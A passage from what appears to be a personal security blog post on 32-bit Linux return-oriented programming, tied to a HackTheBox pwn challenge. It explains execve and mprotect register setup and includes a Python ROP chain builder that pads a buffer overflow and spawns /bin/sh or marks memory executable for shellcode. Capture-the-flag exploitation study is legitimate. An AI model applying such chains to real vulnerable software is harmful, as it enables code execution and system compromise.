fdvoid0's blog

by fdvoid0

To execute /bin/sh through the sys_execve syscall, a few obstacles have to be cleared. Per the reference, the registers must be set up as follows (i386 syscall convention):

EAX = 11 (0x0B in hex), the execve syscall number
EBX = address in memory of the string "/bin/sh" (NUL-terminated)
ECX = address of argv, i.e. a pointer to a NULL-terminated array whose first entry is the address of "/bin/sh"
EDX = NULL (optional pointer to the envp array describing the environment)

Once all of these are in place, executing an int 0x80 instruction should spawn a shell.


Building on the previous ROP exploit, this post covers another way to write ROP chains: instead of using sys_execve to spawn a shell, it uses sys_mprotect to disable NX protection on a region and then executes shellcode there.

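The two register layouts above (execve, and mprotect followed by a return into shellcode) are easiest to see as the words a ROP chain pushes onto the overwritten stack. The following Python builder is an added example, not code from these posts; the gadget addresses, the address of the written "/bin/sh" string and the argv array, and the shellcode address are all hypothetical placeholders that a real exploit would take from ROPgadget/ropper and the binary's writable .data/.bss. It also handles the mprotect page-alignment requirement, since the kernel returns EINVAL for an unaligned start address.

```python
import struct

# Linux i386 syscall numbers (asm/unistd_32.h) and mprotect flags (sys/mman.h).
SYS_EXECVE = 11
SYS_MPROTECT = 125
PROT_RWX = 0x7           # PROT_READ | PROT_WRITE | PROT_EXEC
PAGE_SIZE = 0x1000

# Hypothetical gadget addresses (assumed for this example, non-PIE so fixed).
GADGETS = {
    "pop_eax": 0x080B8016,   # pop eax ; ret
    "pop_ebx": 0x080481C9,   # pop ebx ; ret
    "pop_ecx": 0x080DE955,   # pop ecx ; ret
    "pop_edx": 0x0806EC5A,   # pop edx ; ret
    "int80":   0x08049563,   # int 0x80
}
# Hypothetical writable data addresses: "/bin/sh\0" is assumed to be already
# written at BINSH_ADDR, and ARGV_ADDR holds the array [BINSH_ADDR, 0].
BINSH_ADDR = 0x080EA060
ARGV_ADDR = 0x080EA068


def p32(value):
    """Pack a 32-bit little-endian word, the unit a 32-bit ROP chain is built from."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def chain_words(chain):
    """Decode a chain back into its 32-bit words (for inspection and testing)."""
    return list(struct.unpack("<%dI" % (len(chain) // 4), chain))


def page_align(addr):
    """Round an address down to its page boundary (mprotect requires this)."""
    return addr & ~(PAGE_SIZE - 1)


def set_regs_and_syscall(gadgets, eax, ebx, ecx, edx):
    """Chain: pop EAX/EBX/ECX/EDX from the stack, then trap with int 0x80."""
    return (p32(gadgets["pop_eax"]) + p32(eax) +
            p32(gadgets["pop_ebx"]) + p32(ebx) +
            p32(gadgets["pop_ecx"]) + p32(ecx) +
            p32(gadgets["pop_edx"]) + p32(edx) +
            p32(gadgets["int80"]))


def execve_chain(gadgets, binsh_addr, argv_addr):
    """EAX=11, EBX=&"/bin/sh", ECX=&argv, EDX=NULL -> int 0x80 spawns the shell."""
    return set_regs_and_syscall(gadgets, SYS_EXECVE, binsh_addr, argv_addr, 0)


def mprotect_chain(gadgets, target_addr, length, shellcode_addr):
    """EAX=125, EBX=page-aligned start, ECX=length, EDX=RWX; then return into shellcode.

    The start is rounded down to a page and the length grown by the same amount so
    the requested [target_addr, target_addr+length) region is still fully covered.
    """
    start = page_align(target_addr)
    covered_len = (target_addr + length) - start
    chain = set_regs_and_syscall(gadgets, SYS_MPROTECT, start, covered_len, PROT_RWX)
    # int 0x80 gadget returns here: the next word is the new EIP.
    return chain + p32(shellcode_addr)


def build_payload(offset_to_ret, chain):
    """Padding up to the saved return address, then the chain (stack grows into it)."""
    return b"A" * offset_to_ret + chain


if __name__ == "__main__":
    payload = build_payload(0x30, execve_chain(GADGETS, BINSH_ADDR, ARGV_ADDR))
    for word in chain_words(payload[0x30:]):
        print("0x%08x" % word)
```

Note the 0 written into EDX for execve: if the vulnerable copy stops on a NUL byte (strcpy-style), that word truncates the chain and EDX has to be zeroed another way (an xor edx, edx gadget, or leaving the stale value if it happens to be 0). The same applies to the 0x0B in EAX if the copy treats it as a line terminator.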

Detailed process and exploit

1. Basic checks:

┌──(root💀kali)-[~/hackthebox/challenge/pwn/little_tommy]
└─# file little_tommy
little_tommy: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=861838865726f48aa954b8df920d1be3ae683b40, not stripped
┌──(root💀kali)-[~/hackthebox/challenge/pwn/little_tommy]
└─# checksec little_tommy
[*] '/root/hackthebox/challenge/pwn/little_tommy/little_tommy'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)